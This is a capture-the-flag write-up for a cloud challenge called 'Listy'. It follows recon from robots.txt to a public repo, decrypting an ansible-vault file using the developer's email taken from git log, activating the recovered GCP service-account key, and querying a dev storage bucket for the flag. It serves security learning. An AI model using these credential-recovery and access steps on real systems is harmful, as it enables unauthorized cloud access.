Rating: 5.0
# Listy
### 150 points
> I made a little leaderboard listy app, it's a bit rough so please don't judge me too harshly.
>
> https://listy-web-u7jl3ge7qa-uc.a.run.app/
By visiting the homepage, we can see a simple list with user and score.
Trying to look deeper in the page won't reveal anything more than the use of some sort of js framework
By trying to open `robots.txt`, we're greeted with this:
```
Disallow: *
Disallow: /dev #TODO: Separate off dev branch (https://todo.sr.ht/~listydev/Listy/5)
```
Now, opening /dev will get us to a 404 page:
We can try to open the link in the #TODO comment
Here is the issues of this project. Inside the issue #5 (the one linked above) we can also go to the source of the project.
From there it's clear that is a cloud project created with terraform: a front-end made with next.js and the api served by a lambda function on gcp.
And that is using ansible-vault to store the secrets in the file `vault.txt`.
Here are the points that cought the attention
```sh
# invoke.sh
#!/bin/bash
# Ansible-Vault unlock the gcloud credential
CRED=$(ansible-vault decrypt vault.txt --output /tmp/key.json)
gcloud auth activate-service-account [email protected]
#...
curl -H "Authorization: bearer $(gcloud auth print-identity-token)" https://us-central1-sunshine-2022-challenges.cloudfunctions.net/listy\?bucket\=ssctf22-listy-leaderboard-prod
```
```js
//list.js:19
//...
const response = await fetch(`https://us-central1-${LEADERBOARD_PROJECT}.cloudfunctions.net/${LEADERBOARD_FUNCTION}?bucket=${BUCKET_NAME}`, {
headers: {
Authorization: `bearer ${process.env.GCLOUD_TOKEN}`,
}
})
//...
```
```json
//main.tf
################################################################
## Listy Leaderboard Buckets
################################################################
resource "google_storage_bucket" "listy-leaderboard-prod" {
name = "ssctf22-listy-leaderboard-prod"
location = "US"
force_destroy = true
}
resource "google_storage_bucket_object" "listy-leaderboard-prod" {
name = "leaderboard.csv"
bucket = google_storage_bucket.listy-leaderboard-prod.name
source = "./leaderboards/leaderboard-prod.csv"
}
resource "google_storage_bucket" "listy-leaderboard-dev" {
name = "ssctf22-listy-leaderboard-dev"
location = "US"
force_destroy = true
}
resource "google_storage_bucket_object" "listy-leaderboard-dev" {
name = "leaderboard.csv"
bucket = google_storage_bucket.listy-leaderboard-dev.name
source = "./leaderboards/leaderboard-dev.csv"
}
```
Now, it seems that all we have to do is to read the secret and request the content of the leaderboard-dev, right? We can do this without having to install ansible with `virtualhold/ansible-vault` image:
```
$ docker run --rm -it --entrypoint=/bin/bash virtualhold/ansible-vault
---
$ docker cp vault.txt awesome_wu:/playbook/vault.txt
---
root@0cff51ee3821:/playbook# ansible-vault decrypt vault.txt --output /tmp/key.json
Vault password:
```
But what is the password?
After more time that I'm willing to admit, I've gone back to the issues, hoping to find a hint on how to solve this.
And there it was: _Issue #4_
> ~listydev
>
> Currently, I'm just using a local script w/ a vaulted file for storing a service account. Maybe pull from the gcloud command natively? For now I'm just vaulting with my email to keep secrets scanners from bugging me.
Having access to the repo, we can easily get the user email from the commit history. A `git clone` later and here we are:
```
~/sunshine22/listy/Listy$ git log
commit 3f9c3f2c557aa81f7423d70f0a3252536e4a1f85 (HEAD -> master, origin/master, origin/HEAD)
Author: Listy Dev <[email protected]>
Date: Wed Nov 2 22:23:05 2022 -0600
static stuff
```
From now on, it's all downhill. We just have to install the google-cloud-cli (or use another container) to obtain a valid token and we can get the flag!
```
root@0cff51ee3821:/playbook# ansible-vault decrypt vault.txt --output /tmp/key.json
Vault password: [email protected]
Decryption successful
root@0cff51ee3821:/playbook# cat /tmp/key.json
{
"type": "service_account",
"project_id": "sunshine-2022-challenges",
"private_key_id": ...
}
root@0cff51ee3821:/playbook# gcloud auth activate-service-account listy-developer@sunshine-2022-challenges.iam.gserviceaccount.com '--key-file=/tmp/key.json'
Activated service account credentials for: [listy-developer@sunshine-2022-challenges.iam.gserviceaccount.com]
root@0cff51ee3821:/playbook# curl -H "Authorization: bearer $(gcloud auth print-identity-token)" https://us-central1-sunshine-2022-challenges.cloudfunctions.net/listy\?bucket\=ssctf22-listy-leaderboard-dev
[{"rank":1,"username":"Bill","points":100},{"rank":2,"username":"SpongeBob","points":50},{"rank":3,"username":"sun{5erver1e55-9cp-i5-9re@+}","points":50}]
```
